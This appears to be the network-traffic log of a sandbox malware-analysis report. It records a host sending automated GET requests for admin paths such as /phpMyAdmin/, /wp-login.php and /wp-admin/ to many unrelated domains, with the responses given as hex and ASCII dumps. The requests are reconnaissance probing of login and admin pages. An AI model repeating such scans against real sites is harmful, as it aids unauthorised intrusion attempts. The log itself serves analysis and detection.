                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://app.plex.tv/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd46a99c7bae-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Moved Permanently


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                359192.168.2.66239644.199.96.17980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.784766912 CET182OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.900270939 CET401INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Location: https://pxndx-mcr.boletia.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                360192.168.2.662403170.114.52.280
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.789966106 CET174OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: gitam.zoom.us
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.933079958 CET1004INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 134
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://gitam.zoom.us/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=9aWbkbPT4DdlgG_jg44HMc41AE1.59S3JcFtxwJ.xgU-1707131766-1-AerVx9RXy0Zm7OnurxzYuId07SlHkitQXtOcQmpWK47Y6f+CHIBXVtzdIORdzJ1w/NBTDnTUsLHOaZpdNAQ/zfs=; path=/; expires=Mon, 05-Feb-24 11:46:06 GMT; domain=.zoom.us; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WMZuODp3MdDIZO4COWNeiqXyNueQG%2BXKdtnxcb1B8KlT5B3RN8q8Zc0fmkF%2BmVqaTxE6E80Zm8r20r06JlijKI%2FdGVYeifJCOjw9gAd7WmGLLjxzhDWh9J8uHq1XbK8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd46cdff1371-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                361192.168.2.66245631.13.65.180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.812829018 CET180OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hi-in.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.914983988 CET214INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://hi-in.facebook.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.435920954 CET241OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hi-in.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://m.facebook.com/wp-login.php?locale=hi_IN&_rdr
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.537914991 CET211INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://hi-in.facebook.com/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                362192.168.2.661927124.237.208.3780
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.869349003 CET271OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pan.baidu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: BAIDUID=EB8CC7650E617F0D35F2D5C2F1E7BC8D:FG=1
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://pan.baidu.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.628683090 CET271OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pan.baidu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: BAIDUID=EB8CC7650E617F0D35F2D5C2F1E7BC8D:FG=1
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://pan.baidu.com/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.025955915 CET1280INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"613f221d-3feb"
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900820139405424391
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900820139405424391
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0wSdTQEUmr/tG5LtOUfTwLrrgNFwSCLmQ==
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00 b6 d7 d0 c1 0f b1 96 a5 5b c4 9c 4e a4 0c 78 03 75 d1 04 93 c6 fc 7c 56 53 4c 59 60 79 45 52 b4 49 a4 65 d3 43 d1 13 23 c8 f9 1f 9e 42 ae f6 d1 08 34 36 3f 86 a7 98 24 8a 93 bc d7 00 fc 38 ab 8a 2e 1a a2 22 4f 22 76 22 a6 16 11 3b 36 ae 16 a7 a8 a2 48 3e 59 dd b9 55 5d bd 8f 3a b5 db ae b5 e6 dc 11 56 55 d6 d4 a4 96 24 41 d4 55 09 97 26 91 ac c8 64 ca 4f 81 ed ac 00 a7 41 17 be 0b a9 4d de d2 b9 24 22 90 30 ff 5e ea 4e 7a 6d c5 d9 32 1b 76 e2 ed a2 db 16 d3 50 4a 8b c0 57 37 be 48 0d 45 ce 16 4d 59 32 7b c3 a5 7e a3 83 e3 b4 c8 0f 0f 7a 7d f1 41 6d 7d c3 da b9 7b 00 f4 45
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/TaW(hX\$qE|:+"xdU hj4r"4)I9i$[ol:SN`AvZ69)IRY]%;Pc[[0<[Nxu|VSLY`yERIeC#B46?$8."O"v";6H>YU]:VU$AU&dOAM$"0^Nzm2vPJW7HEMY2{~z}Am}{E
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.025994062 CET1280INData Raw: 11 a2 1c 4f 82 54 dd 20 f3 c5 9c 86 40 39 bf 6f d0 d5 d5 2d eb ca 97 07 40 5c 20 f2 67 39 40 13 04 b9 49 77 78 7a ae dc bb 5a 7d f9 e4 00 90 65 c5 08 d4 30 a5 39 3c a8 b5 f5 cd f2 f6 f5 ca da bf 0f 80 56 30 b1 5c 84 30 d5 97 39 37 88 0f 0f 79 f5
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: OT @9o-@\ g9@IwxzZ}e09<V0\097yVr,+G}NK"?,DfI)Ms:z+$'AS\'q"GKfmX/ytWNOh8O:2eH8ds")3/Hmo
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.026026964 CET131INData Raw: d3 ca 3e f2 30 40 24 df e0 d1 b6 14 7e d5 65 66 92 69 94 97 c7 c7 d5 22 e3 63 ae cd 97 de 2b d2 dd 54 3a 15 1f 64 32 fb d1 fd e8 18 bd 99 76 e3 d8 a7 c5 05 ae 81 30 41 6f 1f 31 07 5b 09 7a f5 5e 8d b1 ce d5 a0 d7 e7 ed 08 82 fd c4 1e 62 7f 70 9c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: >0@$~efi"c+T:d2v0Ao1[z^bpKZKWyD5G6gz9c\`
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.026061058 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.031122923 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.239218950 CET1280INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"613f221d-3feb"
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900820139405424391
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly;
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900820139405424391
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0wSdTQEUmr/tG5LtOUfTwLrrgNFwSCLmQ==
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00 b6 d7 d0 c1 0f b1 96 a5 5b c4 9c 4e a4 0c 78 03 75 d1 04 93 c6 fc 7c 56 53 4c 59 60 79 45 52 b4 49 a4 65 d3 43 d1 13 23 c8 f9 1f 9e 42 ae f6 d1 08 34 36 3f 86 a7 98 24 8a 93 bc d7 00 fc 38 ab 8a 2e 1a a2 22 4f 22 76 22 a6 16 11 3b 36 ae 16 a7 a8 a2 48 3e 59 dd b9 55 5d bd 8f 3a b5 db ae b5 e6 dc 11 56 55 d6 d4 a4 96 24 41 d4 55 09 97 26 91 ac c8 64 ca 4f 81 ed ac 00 a7 41 17 be 0b a9 4d de d2 b9 24 22 90 30 ff 5e ea 4e 7a 6d c5 d9 32 1b 76 e2 ed a2 db 16 d3 50 4a 8b c0 57 37 be 48 0d 45 ce 16 4d 59 32 7b c3 a5 7e a3 83 e3 b4 c8 0f 0f 7a 7d f1 41 6d 7d c3 da b9 7b 00 f4 45
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/TaW(hX\$qE|:+"xdU hj4r"4)I9i$[ol:SN`AvZ69)IRY]%;Pc[[0<[Nxu|VSLY`yERIeC#B46?$8."O"v";6H>YU]:VU$AU&dOAM$"0^Nzm2vPJW7HEMY2{~z}Am}{E
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.401750088 CET136INData Raw: d3 ca 3e f2 30 40 24 df e0 d1 b6 14 7e d5 65 66 92 69 94 97 c7 c7 d5 22 e3 63 ae cd 97 de 2b d2 dd 54 3a 15 1f 64 32 fb d1 fd e8 18 bd 99 76 e3 d8 a7 c5 05 ae 81 30 41 6f 1f 31 07 5b 09 7a f5 5e 8d b1 ce d5 a0 d7 e7 ed 08 82 fd c4 1e 62 7f 70 9c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: >0@$~efi"c+T:d2v0Ao1[z^bpKZKWyD5G6gz9c\`0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                363192.168.2.66195536.255.71.4580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.892966032 CET188OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: instructory.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.264568090 CET162INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://instructory.net/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                364192.168.2.662586104.21.5.2580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.899399996 CET173OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: opsu.terna.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.024399996 CET699INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://terna.net
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ukxxxIYCeSZoG1zKZ9OkywrIoBpX%2Fvo2hSfHSu1mtCgYg8HuaakzHaEHFzffO%2BPZb3nZo1WuDCQ9x%2BR0t%2BJ4ZCenxxtZQDAEYTxEHqUEfMj2uCVSCoF74ZitfnN45NkLFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd4778ae2444-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                365192.168.2.662588172.67.170.14780
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.900527954 CET182OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: poligrafosecuador.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.178920031 CET820INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://poligrafosecuador.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
